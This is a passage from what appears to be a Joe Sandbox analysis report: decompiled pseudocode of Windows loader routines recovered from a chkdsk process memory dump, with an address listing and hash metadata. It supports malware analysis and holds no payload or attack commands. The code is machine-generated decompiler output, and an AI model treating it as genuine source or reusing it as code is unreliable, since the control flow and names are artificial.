                                                      				_v212 = _a16;
                                                      				_v180 = _a24;
                                                      				_v168 = 0;
                                                      				_v157 = 0;
                                                      				if( *_t2 != 0) {
                                                      					__eflags = E04D96600(0x4e752d8);
                                                      					if(__eflags == 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						_v188 = 6;
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					_v188 = 9;
                                                      				}
                                                      				if(_t365 == 0) {
                                                      					_v164 = 0;
                                                      					goto L5;
                                                      				} else {
                                                      					_t363 =  *_t365 & 0x0000ffff;
                                                      					_t341 = _t363 + 1;
                                                      					if((_t365[1] & 0x0000ffff) < _t341) {
                                                      						L109:
                                                      						__eflags = _t341 - 0x80;
                                                      						if(_t341 <= 0x80) {
                                                      							_t281 =  &_v140;
                                                      							_v164 =  &_v140;
                                                      							goto L114;
                                                      						} else {
                                                      							_t283 =  *0x4e77b9c; // 0x0
                                                      							_t281 = L04DA4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                      							_v164 = _t281;
                                                      							__eflags = _t281;
                                                      							if(_t281 != 0) {
                                                      								_v157 = 1;
                                                      								L114:
                                                      								E04DCF3E0(_t281, _t365[2], _t363);
                                                      								_t200 = _v164;
                                                      								 *((char*)(_v164 + _t363)) = 0;
                                                      								goto L5;
                                                      							} else {
                                                      								_t204 = 0xc000009a;
                                                      								goto L47;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t200 = _t365[2];
                                                      						_v164 = _t200;
                                                      						if( *((char*)(_t200 + _t363)) != 0) {
                                                      							goto L109;
                                                      						} else {
                                                      							while(1) {
                                                      								L5:
                                                      								_t353 = 0;
                                                      								_t342 = 0x1000;
                                                      								_v176 = 0;
                                                      								if(_t287 == 0) {
                                                      									break;
                                                      								}
                                                      								_t384 = _t287 -  *0x4e77b90; // 0x775e0000
                                                      								if(_t384 == 0) {
                                                      									_t353 =  *0x4e77b8c; // 0x3029e0
                                                      									_v176 = _t353;
                                                      									_t63 = _t353 + 0x50; // 0x302a90
                                                      									_t64 =  *_t63 + 0x20; // 0x9
                                                      									_t320 =  *_t64;
                                                      									_v184 = _t320;
                                                      								} else {
                                                      									E04DA2280(_t200, 0x4e784d8);
                                                      									_t277 =  *0x4e785f4; // 0x303cf8
                                                      									_t351 =  *0x4e785f8 & 1;
                                                      									while(_t277 != 0) {
                                                      										_t21 = _t277 - 0x50; // 0x74c80000
                                                      										_t337 =  *_t21;
                                                      										if(_t337 > _t287) {
                                                      											_t338 = _t337 | 0xffffffff;
                                                      										} else {
                                                      											asm("sbb ecx, ecx");
                                                      											_t338 =  ~_t337;
                                                      										}
                                                      										_t387 = _t338;
                                                      										if(_t387 < 0) {
                                                      											_t339 =  *_t277;
                                                      											__eflags = _t351;
                                                      											if(_t351 != 0) {
                                                      												__eflags = _t339;
                                                      												if(_t339 == 0) {
                                                      													goto L16;
                                                      												} else {
                                                      													goto L118;
                                                      												}
                                                      												goto L151;
                                                      											} else {
                                                      												goto L16;
                                                      											}
                                                      											goto L17;
                                                      										} else {
                                                      											if(_t387 <= 0) {
                                                      												__eflags = _t277;
                                                      												if(_t277 != 0) {
                                                      													_t23 = _t277 - 0x18; // 0x303d40
                                                      													_t340 =  *_t23;
                                                      													_t24 = _t277 - 0x68; // 0x303c90
                                                      													_t353 = _t24;
                                                      													_v176 = _t353;
                                                      													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
                                                      													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
                                                      														_t279 =  *_t340;
                                                      														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                      														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                      															asm("lock inc dword [edi+0x9c]");
                                                      															_t30 = _t353 + 0x50; // 0x303d40
                                                      															_t340 =  *_t30;
                                                      														}
                                                      													}
                                                      													_t31 = _t340 + 0x20; // 0x9
                                                      													_v184 =  *_t31;
                                                      												}
                                                      											} else {
                                                      												_t22 = _t277 + 4; // 0x302ed0
                                                      												_t339 =  *_t22;
                                                      												if(_t351 != 0) {
                                                      													__eflags = _t339;
                                                      													if(_t339 == 0) {
                                                      														goto L16;
                                                      													} else {
                                                      														L118:
                                                      														_t277 = _t277 ^ _t339;
                                                      														goto L17;
                                                      													}
                                                      													goto L151;
                                                      												} else {
                                                      													L16:
                                                      													_t277 = _t339;
                                                      												}
                                                      												goto L17;
                                                      											}
                                                      										}
                                                      										goto L25;
                                                      										L17:
                                                      									}
                                                      									L25:
                                                      									E04D9FFB0(_t287, _t353, 0x4e784d8);
                                                      									_t320 = _v184;
                                                      									_t342 = 0x1000;
                                                      								}
                                                      								if(_t353 == 0) {
                                                      									break;
                                                      								} else {
                                                      									_t366 = 0;
                                                      									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                      										_t288 = _v164;
                                                      										if(_t353 != 0) {
                                                      											_t342 = _t288;
                                                      											_t374 = E04DDCC99(_t353, _t288, _v200, 1,  &_v168);
                                                      											if(_t374 >= 0) {
                                                      												if(_v184 == 7) {
                                                      													__eflags = _a20;
                                                      													if(__eflags == 0) {
                                                      														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                      														if(__eflags != 0) {
                                                      															_t271 = E04D96600(0x4e752d8);
                                                      															__eflags = _t271;
                                                      															if(__eflags == 0) {
                                                      																_t342 = 0;
                                                      																_v169 = _t271;
                                                      																_t374 = E04D97926( *(_t353 + 0x50), 0,  &_v169);
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												if(_t374 < 0) {
                                                      													_v168 = 0;
                                                      												} else {
                                                      													if( *0x4e7b239 != 0) {
                                                      														_t342 =  *(_t353 + 0x18);
                                                      														E04E0E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                      													}
                                                      													if( *0x4e78472 != 0) {
                                                      														_v192 = 0;
                                                      														_t342 =  *0x7ffe0330;
                                                      														_t361 =  *0x4e7b218; // 0x0
                                                      														asm("ror edi, cl");
                                                      														 *0x4e7b1e0( &_v192, _t353, _v168, 0, _v180);
                                                      														 *(_t361 ^  *0x7ffe0330)();
                                                      														_t269 = _v192;
                                                      														_t353 = _v176;
                                                      														__eflags = _t269;
                                                      														if(__eflags != 0) {
                                                      															_v168 = _t269;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                      												_t366 = 0xc000007a;
                                                      											}
                                                      											_t247 =  *(_t353 + 0x50);
                                                      											if(_t247[3] == 0xffffffff) {
                                                      												L40:
                                                      												if(_t366 == 0xc000007a) {
                                                      													__eflags = _t288;
                                                      													if(_t288 == 0) {
                                                      														goto L136;
                                                      													} else {
                                                      														_t366 = 0xc0000139;
                                                      													}
                                                      													goto L54;
                                                      												}
                                                      											} else {
                                                      												_t249 =  *_t247;
                                                      												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                      													goto L40;
                                                      												} else {
                                                      													_t250 = _t249 | 0xffffffff;
                                                      													asm("lock xadd [edi+0x9c], eax");
                                                      													if((_t249 | 0xffffffff) == 0) {
                                                      														E04DA2280(_t250, 0x4e784d8);
                                                      														_t342 =  *(_t353 + 0x54);
                                                      														_t165 = _t353 + 0x54; // 0x54
                                                      														_t252 = _t165;
                                                      														__eflags =  *(_t342 + 4) - _t252;
                                                      														if( *(_t342 + 4) != _t252) {
                                                      															L135:
                                                      															asm("int 0x29");
                                                      															L136:
                                                      															_t288 = _v200;
                                                      															_t366 = 0xc0000138;
                                                      															L54:
                                                      															_t342 = _t288;
                                                      															L04DC3898(0, _t288, _t366);
                                                      														} else {
                                                      															_t324 =  *(_t252 + 4);
                                                      															__eflags =  *_t324 - _t252;
                                                      															if( *_t324 != _t252) {
                                                      																goto L135;
                                                      															} else {
                                                      																 *_t324 = _t342;
                                                      																 *(_t342 + 4) = _t324;
                                                      																_t293 =  *(_t353 + 0x50);
                                                      																_v180 =  *_t293;
                                                      																E04D9FFB0(_t293, _t353, 0x4e784d8);
                                                      																__eflags =  *((short*)(_t353 + 0x3a));
                                                      																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                      																	_t342 = 0;
                                                      																	__eflags = 0;
                                                      																	E04DC37F5(_t353, 0);
                                                      																}
                                                      																E04DC0413(_t353);
                                                      																_t256 =  *(_t353 + 0x48);
                                                      																__eflags = _t256;
                                                      																if(_t256 != 0) {
                                                      																	__eflags = _t256 - 0xffffffff;
                                                      																	if(_t256 != 0xffffffff) {
                                                      																		E04DB9B10(_t256);
                                                      																	}
                                                      																}
                                                      																__eflags =  *(_t353 + 0x28);
                                                      																if( *(_t353 + 0x28) != 0) {
                                                      																	_t174 = _t353 + 0x24; // 0x24
                                                      																	E04DB02D6(_t174);
                                                      																}
                                                      																L04DA77F0( *0x4e77b98, 0, _t353);
                                                      																__eflags = _v180 - _t293;
                                                      																if(__eflags == 0) {
                                                      																	E04DBC277(_t293, _t366);
                                                      																}
                                                      																_t288 = _v164;
                                                      																goto L40;
                                                      															}
                                                      														}
                                                      													} else {
                                                      														goto L40;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										L04D9EC7F(_t353);
                                                      										L04DB19B8(_t287, 0, _t353, 0);
                                                      										_t200 = E04D8F4E3(__eflags);
                                                      										continue;
                                                      									}
                                                      								}
                                                      								L41:
                                                      								if(_v157 != 0) {
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                      								}
                                                      								if(_t366 < 0) {
                                                      									L46:
                                                      									 *_v212 = _v168;
                                                      									_t204 = _t366;
                                                      									L47:
                                                      									_pop(_t354);
                                                      									_pop(_t367);
                                                      									_pop(_t289);
                                                      									return E04DCB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                      								} else {
                                                      									_t206 =  *0x4e7b2f8; // 0x790000
                                                      									if((_t206 |  *0x4e7b2fc) == 0 || ( *0x4e7b2e4 & 0x00000001) != 0) {
                                                      										goto L46;
                                                      									} else {
                                                      										_t297 =  *0x4e7b2ec; // 0x100
                                                      										_v200 = 0;
                                                      										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                                      											_t355 = _v168;
                                                      											_t342 =  &_v208;
                                                      											_t208 = E04E36B68(_v168,  &_v208, _v168, __eflags);
                                                      											__eflags = _t208 - 1;
                                                      											if(_t208 == 1) {
                                                      												goto L46;
                                                      											} else {
                                                      												__eflags = _v208 & 0x00000010;
                                                      												if((_v208 & 0x00000010) == 0) {
                                                      													goto L46;
                                                      												} else {
                                                      													_t342 = 4;
                                                      													_t366 = E04E36AEB(_t355, 4,  &_v216);
                                                      													__eflags = _t366;
                                                      													if(_t366 >= 0) {
                                                      														goto L46;
                                                      													} else {
                                                      														asm("int 0x29");
                                                      														_t356 = 0;
                                                      														_v44 = 0;
                                                      														_t290 = _v52;
                                                      														__eflags = 0;
                                                      														if(0 == 0) {
                                                      															L108:
                                                      															_t356 = 0;
                                                      															_v44 = 0;
                                                      															goto L63;
                                                      														} else {
                                                      															__eflags = 0;
                                                      															if(0 < 0) {
                                                      																goto L108;
                                                      															}
                                                      															L63:
                                                      															_v112 = _t356;
                                                      															__eflags = _t356;
                                                      															if(_t356 == 0) {
                                                      																L143:
                                                      																_v8 = 0xfffffffe;
                                                      																_t211 = 0xc0000089;
                                                      															} else {
                                                      																_v36 = 0;
                                                      																_v60 = 0;
                                                      																_v48 = 0;
                                                      																_v68 = 0;
                                                      																_v44 = _t290 & 0xfffffffc;
                                                      																E04D9E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                      																_t306 = _v68;
                                                      																__eflags = _t306;
                                                      																if(_t306 == 0) {
                                                      																	_t216 = 0xc000007b;
                                                      																	_v36 = 0xc000007b;
                                                      																	_t307 = _v60;
                                                      																} else {
                                                      																	__eflags = _t290 & 0x00000001;
                                                      																	if(__eflags == 0) {
                                                      																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                      																		__eflags = _t349 - 0x10b;
                                                      																		if(_t349 != 0x10b) {
                                                      																			__eflags = _t349 - 0x20b;
                                                      																			if(_t349 == 0x20b) {
                                                      																				goto L102;
                                                      																			} else {
                                                      																				_t307 = 0;
                                                      																				_v48 = 0;
                                                      																				_t216 = 0xc000007b;
                                                      																				_v36 = 0xc000007b;
                                                      																				goto L71;
                                                      																			}
                                                      																		} else {
                                                      																			L102:
                                                      																			_t307 =  *(_t306 + 0x50);
                                                      																			goto L69;
                                                      																		}
                                                      																		goto L151;
                                                      																	} else {
                                                      																		_t239 = L04D9EAEA(_t290, _t290, _t356, _t366, __eflags);
                                                      																		_t307 = _t239;
                                                      																		_v60 = _t307;
                                                      																		_v48 = _t307;
                                                      																		__eflags = _t307;
                                                      																		if(_t307 != 0) {
                                                      																			L70:
                                                      																			_t216 = _v36;
                                                      																		} else {
                                                      																			_push(_t239);
                                                      																			_push(0x14);
                                                      																			_push( &_v144);
                                                      																			_push(3);
                                                      																			_push(_v44);
                                                      																			_push(0xffffffff);
                                                      																			_t319 = E04DC9730();
                                                      																			_v36 = _t319;
                                                      																			__eflags = _t319;
                                                      																			if(_t319 < 0) {
                                                      																				_t216 = 0xc000001f;
                                                      																				_v36 = 0xc000001f;
                                                      																				_t307 = _v60;
                                                      																			} else {
                                                      																				_t307 = _v132;
                                                      																				L69:
                                                      																				_v48 = _t307;
                                                      																				goto L70;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      																L71:
                                                      																_v72 = _t307;
                                                      																_v84 = _t216;
                                                      																__eflags = _t216 - 0xc000007b;
                                                      																if(_t216 == 0xc000007b) {
                                                      																	L150:
                                                      																	_v8 = 0xfffffffe;
                                                      																	_t211 = 0xc000007b;
                                                      																} else {
                                                      																	_t344 = _t290 & 0xfffffffc;
                                                      																	_v76 = _t344;
                                                      																	__eflags = _v40 - _t344;
                                                      																	if(_v40 <= _t344) {
                                                      																		goto L150;
                                                      																	} else {
                                                      																		__eflags = _t307;
                                                      																		if(_t307 == 0) {
                                                      																			L75:
                                                      																			_t217 = 0;
                                                      																			_v104 = 0;
                                                      																			__eflags = _t366;
                                                      																			if(_t366 != 0) {
                                                      																				__eflags = _t290 & 0x00000001;
                                                      																				if((_t290 & 0x00000001) != 0) {
                                                      																					_t217 = 1;
                                                      																					_v104 = 1;
                                                      																				}
                                                      																				_t290 = _v44;
                                                      																				_v52 = _t290;
                                                      																			}
                                                      																			__eflags = _t217 - 1;
                                                      																			if(_t217 != 1) {
                                                      																				_t369 = 0;
                                                      																				_t218 = _v40;
                                                      																				goto L91;
                                                      																			} else {
                                                      																				_v64 = 0;
                                                      																				E04D9E9C0(1, _t290, 0, 0,  &_v64);
                                                      																				_t309 = _v64;
                                                      																				_v108 = _t309;
                                                      																				__eflags = _t309;
                                                      																				if(_t309 == 0) {
                                                      																					goto L143;
                                                      																				} else {
                                                      																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                      																					__eflags = _t226 - 0x10b;
                                                      																					if(_t226 != 0x10b) {
                                                      																						__eflags = _t226 - 0x20b;
                                                      																						if(_t226 != 0x20b) {
                                                      																							goto L143;
                                                      																						} else {
                                                      																							_t371 =  *(_t309 + 0x98);
                                                      																							goto L83;
                                                      																						}
                                                      																					} else {
                                                      																						_t371 =  *(_t309 + 0x88);
                                                      																						L83:
                                                      																						__eflags = _t371;
                                                      																						if(_t371 != 0) {
                                                      																							_v80 = _t371 - _t356 + _t290;
                                                      																							_t310 = _v64;
                                                      																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                      																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                      																							_t311 = 0;
                                                      																							__eflags = 0;
                                                      																							while(1) {
                                                      																								_v120 = _t311;
                                                      																								_v116 = _t348;
                                                      																								__eflags = _t311 - _t292;
                                                      																								if(_t311 >= _t292) {
                                                      																									goto L143;
                                                      																								}
                                                      																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                      																								__eflags = _t371 - _t359;
                                                      																								if(_t371 < _t359) {
                                                      																									L98:
                                                      																									_t348 = _t348 + 0x28;
                                                      																									_t311 = _t311 + 1;
                                                      																									continue;
                                                      																								} else {
                                                      																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                      																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                      																										goto L98;
                                                      																									} else {
                                                      																										__eflags = _t348;
                                                      																										if(_t348 == 0) {
                                                      																											goto L143;
                                                      																										} else {
                                                      																											_t218 = _v40;
                                                      																											_t312 =  *_t218;
                                                      																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                      																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                      																												_v100 = _t359;
                                                      																												_t360 = _v108;
                                                      																												_t372 = L04D98F44(_v108, _t312);
                                                      																												__eflags = _t372;
                                                      																												if(_t372 == 0) {
                                                      																													goto L143;
                                                      																												} else {
                                                      																													_t290 = _v52;
                                                      																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04DC3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                      																													_t307 = _v72;
                                                      																													_t344 = _v76;
                                                      																													_t218 = _v40;
                                                      																													goto L91;
                                                      																												}
                                                      																											} else {
                                                      																												_t290 = _v52;
                                                      																												_t307 = _v72;
                                                      																												_t344 = _v76;
                                                      																												_t369 = _v80;
                                                      																												L91:
                                                      																												_t358 = _a4;
                                                      																												__eflags = _t358;
                                                      																												if(_t358 == 0) {
                                                      																													L95:
                                                      																													_t308 = _a8;
                                                      																													__eflags = _t308;
                                                      																													if(_t308 != 0) {
                                                      																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                      																													}
                                                      																													_v8 = 0xfffffffe;
                                                      																													_t211 = _v84;
                                                      																												} else {
                                                      																													_t370 =  *_t218 - _t369 + _t290;
                                                      																													 *_t358 = _t370;
                                                      																													__eflags = _t370 - _t344;
                                                      																													if(_t370 <= _t344) {
                                                      																														L149:
                                                      																														 *_t358 = 0;
                                                      																														goto L150;
                                                      																													} else {
                                                      																														__eflags = _t307;
                                                      																														if(_t307 == 0) {
                                                      																															goto L95;
                                                      																														} else {
                                                      																															__eflags = _t370 - _t344 + _t307;
                                                      																															if(_t370 >= _t344 + _t307) {
                                                      																																goto L149;
                                                      																															} else {
                                                      																																goto L95;
                                                      																															}
                                                      																														}
                                                      																													}
                                                      																												}
                                                      																											}
                                                      																										}
                                                      																									}
                                                      																								}
                                                      																								goto L97;
                                                      																							}
                                                      																						}
                                                      																						goto L143;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																		} else {
                                                      																			__eflags = _v40 - _t307 + _t344;
                                                      																			if(_v40 >= _t307 + _t344) {
                                                      																				goto L150;
                                                      																			} else {
                                                      																				goto L75;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      															L97:
                                                      															 *[fs:0x0] = _v20;
                                                      															return _t211;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										} else {
                                                      											goto L46;
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L151;
                                                      							}
                                                      							_t288 = _v164;
                                                      							_t366 = 0xc0000135;
                                                      							goto L41;
                                                      						}
                                                      					}
                                                      				}
                                                      				L151:
                                                      			}
                                                      0x04deb3df
                                                      0x04deb3e2
                                                      0x04deb468
                                                      0x04deb46d
                                                      0x04deb46f
                                                      0x04deb46f
                                                      0x04deb475
                                                      0x04d9d8f8
                                                      0x04d9d8f9
                                                      0x04d9d8fd
                                                      0x04deb3e8
                                                      0x04deb3e8
                                                      0x04deb3eb
                                                      0x04deb3ed
                                                      0x00000000
                                                      0x04deb3ef
                                                      0x04deb3ef
                                                      0x04deb3f1
                                                      0x04deb3f4
                                                      0x04deb3fe
                                                      0x04deb404
                                                      0x04deb409
                                                      0x04deb40e
                                                      0x04deb410
                                                      0x04deb410
                                                      0x04deb414
                                                      0x04deb414
                                                      0x04deb41b
                                                      0x04deb420
                                                      0x04deb423
                                                      0x04deb425
                                                      0x04deb427
                                                      0x04deb42a
                                                      0x04deb42d
                                                      0x04deb42d
                                                      0x04deb42a
                                                      0x04deb432
                                                      0x04deb436
                                                      0x04deb438
                                                      0x04deb43b
                                                      0x04deb43b
                                                      0x04deb449
                                                      0x04deb44e
                                                      0x04deb454
                                                      0x04deb458
                                                      0x04deb458
                                                      0x04deb45d
                                                      0x00000000
                                                      0x04deb45d
                                                      0x04deb3ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9d7df
                                                      0x04d9d7d2
                                                      0x04d9d7ca
                                                      0x04deb37c
                                                      0x04deb37e
                                                      0x04deb385
                                                      0x04deb38a
                                                      0x00000000
                                                      0x04deb38a
                                                      0x04d9d742
                                                      0x04d9d7f1
                                                      0x04d9d7f8
                                                      0x04deb49b
                                                      0x04deb49b
                                                      0x04d9d800
                                                      0x04d9d837
                                                      0x04d9d843
                                                      0x04d9d845
                                                      0x04d9d847
                                                      0x04d9d84a
                                                      0x04d9d84b
                                                      0x04d9d84e
                                                      0x04d9d857
                                                      0x04d9d802
                                                      0x04d9d802
                                                      0x04d9d80d
                                                      0x00000000
                                                      0x04d9d818
                                                      0x04d9d818
                                                      0x04d9d824
                                                      0x04d9d831
                                                      0x04deb4a5
                                                      0x04deb4ab
                                                      0x04deb4b3
                                                      0x04deb4b8
                                                      0x04deb4bb
                                                      0x00000000
                                                      0x04deb4c1
                                                      0x04deb4c1
                                                      0x04deb4c8
                                                      0x00000000
                                                      0x04deb4ce
                                                      0x04deb4d4
                                                      0x04deb4e1
                                                      0x04deb4e3
                                                      0x04deb4e5
                                                      0x00000000
                                                      0x04deb4eb
                                                      0x04deb4f0
                                                      0x04deb4f2
                                                      0x04d9dac9
                                                      0x04d9dacc
                                                      0x04d9dacf
                                                      0x04d9dad1
                                                      0x04d9dd78
                                                      0x04d9dd78
                                                      0x04d9dcf2
                                                      0x00000000
                                                      0x04d9dad7
                                                      0x04d9dad9
                                                      0x04d9dadb
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9dae1
                                                      0x04d9dae1
                                                      0x04d9dae4
                                                      0x04d9dae6
                                                      0x04deb4f9
                                                      0x04deb4f9
                                                      0x04deb500
                                                      0x04d9daec
                                                      0x04d9daec
                                                      0x04d9daf5
                                                      0x04d9daf8
                                                      0x04d9dafb
                                                      0x04d9db03
                                                      0x04d9db11
                                                      0x04d9db16
                                                      0x04d9db19
                                                      0x04d9db1b
                                                      0x04deb52c
                                                      0x04deb531
                                                      0x04deb534
                                                      0x04d9db21
                                                      0x04d9db21
                                                      0x04d9db24
                                                      0x04d9dcd9
                                                      0x04d9dce2
                                                      0x04d9dce5
                                                      0x04d9dd6a
                                                      0x04d9dd6d
                                                      0x00000000
                                                      0x04d9dd73
                                                      0x04deb51a
                                                      0x04deb51c
                                                      0x04deb51f
                                                      0x04deb524
                                                      0x00000000
                                                      0x04deb524
                                                      0x04d9dce7
                                                      0x04d9dce7
                                                      0x04d9dce7
                                                      0x00000000
                                                      0x04d9dce7
                                                      0x00000000
                                                      0x04d9db2a
                                                      0x04d9db2c
                                                      0x04d9db31
                                                      0x04d9db33
                                                      0x04d9db36
                                                      0x04d9db39
                                                      0x04d9db3b
                                                      0x04d9db66
                                                      0x04d9db66
                                                      0x04d9db3d
                                                      0x04d9db3d
                                                      0x04d9db3e
                                                      0x04d9db46
                                                      0x04d9db47
                                                      0x04d9db49
                                                      0x04d9db4c
                                                      0x04d9db53
                                                      0x04d9db55
                                                      0x04d9db58
                                                      0x04d9db5a
                                                      0x04deb50a
                                                      0x04deb50f
                                                      0x04deb512
                                                      0x04d9db60
                                                      0x04d9db60
                                                      0x04d9db63
                                                      0x04d9db63
                                                      0x00000000
                                                      0x04d9db63
                                                      0x04d9db5a
                                                      0x04d9db3b
                                                      0x04d9db24
                                                      0x04d9db69
                                                      0x04d9db69
                                                      0x04d9db6c
                                                      0x04d9db6f
                                                      0x04d9db74
                                                      0x04deb557
                                                      0x04deb557
                                                      0x04deb55e
                                                      0x04d9db7a
                                                      0x04d9db7c
                                                      0x04d9db7f
                                                      0x04d9db82
                                                      0x04d9db85
                                                      0x00000000
                                                      0x04d9db8b
                                                      0x04d9db8b
                                                      0x04d9db8d
                                                      0x04d9db9b
                                                      0x04d9db9b
                                                      0x04d9db9d
                                                      0x04d9dba0
                                                      0x04d9dba2
                                                      0x04d9dba4
                                                      0x04d9dba7
                                                      0x04d9dba9
                                                      0x04d9dbae
                                                      0x04d9dbae
                                                      0x04d9dbb1
                                                      0x04d9dbb4
                                                      0x04d9dbb4
                                                      0x04d9dbb7
                                                      0x04d9dbba
                                                      0x04d9dcd2
                                                      0x04d9dcd4
                                                      0x00000000
                                                      0x04d9dbc0
                                                      0x04d9dbc0
                                                      0x04d9dbd2
                                                      0x04d9dbd7
                                                      0x04d9dbda
                                                      0x04d9dbdd
                                                      0x04d9dbdf
                                                      0x00000000
                                                      0x04d9dbe5
                                                      0x04d9dbe5
                                                      0x04d9dbee
                                                      0x04d9dbf1
                                                      0x04deb541
                                                      0x04deb544
                                                      0x00000000
                                                      0x04deb546
                                                      0x04deb546
                                                      0x00000000
                                                      0x04deb546
                                                      0x04d9dbf7
                                                      0x04d9dbf7
                                                      0x04d9dbfd
                                                      0x04d9dbfd
                                                      0x04d9dbff
                                                      0x04d9dc0b
                                                      0x04d9dc15
                                                      0x04d9dc1b
                                                      0x04d9dc1d
                                                      0x04d9dc21
                                                      0x04d9dc21
                                                      0x04d9dc23
                                                      0x04d9dc23
                                                      0x04d9dc26
                                                      0x04d9dc29
                                                      0x04d9dc2b
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9dc31
                                                      0x04d9dc34
                                                      0x04d9dc36
                                                      0x04d9dcbf
                                                      0x04d9dcbf
                                                      0x04d9dcc2
                                                      0x00000000
                                                      0x04d9dc3c
                                                      0x04d9dc41
                                                      0x04d9dc43
                                                      0x00000000
                                                      0x04d9dc45
                                                      0x04d9dc45
                                                      0x04d9dc47
                                                      0x00000000
                                                      0x04d9dc4d
                                                      0x04d9dc4d
                                                      0x04d9dc50
                                                      0x04d9dc52
                                                      0x04d9dc55
                                                      0x04d9dcfa
                                                      0x04d9dcfe
                                                      0x04d9dd08
                                                      0x04d9dd0a
                                                      0x04d9dd0c
                                                      0x00000000
                                                      0x04d9dd12
                                                      0x04d9dd15
                                                      0x04d9dd2d
                                                      0x04d9dd2f
                                                      0x04d9dd32
                                                      0x04d9dd35
                                                      0x00000000
                                                      0x04d9dd35
                                                      0x04d9dc5b
                                                      0x04d9dc5b
                                                      0x04d9dc5e
                                                      0x04d9dc61
                                                      0x04d9dc64
                                                      0x04d9dc67
                                                      0x04d9dc67
                                                      0x04d9dc6a
                                                      0x04d9dc6c
                                                      0x04d9dc8e
                                                      0x04d9dc8e
                                                      0x04d9dc91
                                                      0x04d9dc93
                                                      0x04d9dcce
                                                      0x04d9dcce
                                                      0x04d9dc95
                                                      0x04d9dc9c
                                                      0x04d9dc6e
                                                      0x04d9dc72
                                                      0x04d9dc75
                                                      0x04d9dc77
                                                      0x04d9dc79
                                                      0x04deb551
                                                      0x04deb551
                                                      0x00000000
                                                      0x04d9dc7f
                                                      0x04d9dc7f
                                                      0x04d9dc81
                                                      0x00000000
                                                      0x04d9dc83
                                                      0x04d9dc86
                                                      0x04d9dc88
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9dc88
                                                      0x04d9dc81
                                                      0x04d9dc79
                                                      0x04d9dc6c
                                                      0x04d9dc55
                                                      0x04d9dc47
                                                      0x04d9dc43
                                                      0x00000000
                                                      0x04d9dc36
                                                      0x04d9dc23
                                                      0x00000000
                                                      0x04d9dbff
                                                      0x04d9dbf1
                                                      0x04d9dbdf
                                                      0x04d9db8f
                                                      0x04d9db92
                                                      0x04d9db95
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9db95
                                                      0x04d9db8d
                                                      0x04d9db85
                                                      0x04d9db74
                                                      0x04d9dc9f
                                                      0x04d9dca2
                                                      0x04d9dcb0
                                                      0x04d9dcb0
                                                      0x04d9dad1
                                                      0x04deb4e5
                                                      0x04deb4c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9d831
                                                      0x04d9d80d
                                                      0x00000000
                                                      0x04d9d800
                                                      0x04deb47f
                                                      0x04deb485
                                                      0x00000000
                                                      0x04deb485
                                                      0x04d9d665
                                                      0x04d9d652
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )0
                                                      • API String ID: 0-2259565531
                                                      • Opcode ID: ab34769514df47ba4c4a3e569e593b419e3cb8e4614fa2bf706d0f6943d457b5
                                                      • Instruction ID: a03b4e3b1129ac849a33fb86e3f6f240fd1d32dcea8c073cb82bf6876c52fad0
                                                      • Opcode Fuzzy Hash: ab34769514df47ba4c4a3e569e593b419e3cb8e4614fa2bf706d0f6943d457b5
